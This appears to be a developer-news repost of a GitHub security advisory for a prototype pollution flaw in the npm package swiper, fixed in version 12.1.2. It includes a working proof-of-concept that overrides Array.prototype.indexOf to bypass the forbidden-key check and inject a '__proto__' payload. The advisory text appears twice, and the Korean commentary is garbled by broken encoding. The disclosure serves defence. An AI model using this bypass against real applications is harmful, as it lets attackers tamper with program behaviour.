![[swiper] Prototype pollution in swiper](/assets/images/github_com_1771583669981.png)
Security Advisories์ถ์ฒ: GitHub Security Advisories์กฐํ์ 9
[swiper] Prototype pollution in swiper
By GitHub2026๋
2์ 20์ผ
**[swiper] Prototype pollution in swiper**
Summary A prototype pollution vulnerability exists in the the npm package swiper (>=6.5.1, < 12.1.2). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. The exploit works across Windows and Linux and on Node and Bun runtimes. This issue is fixed in version 12.1.2 Details The vulnerability resides in line 94 of shared/utils.mjs where indexOf() function is used to check whether user provided input contain forbidden strings. PoC Steps to reproduce Install latest version of swiper using npm install Run the following code snippet: var swiper = require('swiper'); Array.prototype.indexOf = () => -1; let obj = {}; var malicious_payload = '{"__proto__":{"polluted":"yes"}}'; console.log({}.polluted); swiper.default.extendDefaults(JSON.parse(malicious_payload)); console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred Expected behavior Prototype pollution should be prevented and {} should not gain new properties...
---
**[devsupporter ํด์ค]**
์ด ๊ธฐ์ฌ๋ GitHub Security Advisories์์ ์ ๊ณตํ๋ ์ต์ ๊ฐ๋ฐ ๋ํฅ์ ๋๋ค. ๊ด๋ จ ๋๊ตฌ๋ ๊ธฐ์ ์ ๋ํด ๋ ์์๋ณด์๋ ค๋ฉด ์๋ณธ ๋งํฌ๋ฅผ ์ฐธ๊ณ ํ์ธ์.
Summary A prototype pollution vulnerability exists in the the npm package swiper (>=6.5.1, < 12.1.2). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input contained a forbidden key, it is still possible to pollute Object.prototype via a crafted input using Array.prototype. The exploit works across Windows and Linux and on Node and Bun runtimes. This issue is fixed in version 12.1.2 Details The vulnerability resides in line 94 of shared/utils.mjs where indexOf() function is used to check whether user provided input contain forbidden strings. PoC Steps to reproduce Install latest version of swiper using npm install Run the following code snippet: var swiper = require('swiper'); Array.prototype.indexOf = () => -1; let obj = {}; var malicious_payload = '{"__proto__":{"polluted":"yes"}}'; console.log({}.polluted); swiper.default.extendDefaults(JSON.parse(malicious_payload)); console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred Expected behavior Prototype pollution should be prevented and {} should not gain new properties...
---
**[devsupporter ํด์ค]**
์ด ๊ธฐ์ฌ๋ GitHub Security Advisories์์ ์ ๊ณตํ๋ ์ต์ ๊ฐ๋ฐ ๋ํฅ์ ๋๋ค. ๊ด๋ จ ๋๊ตฌ๋ ๊ธฐ์ ์ ๋ํด ๋ ์์๋ณด์๋ ค๋ฉด ์๋ณธ ๋งํฌ๋ฅผ ์ฐธ๊ณ ํ์ธ์.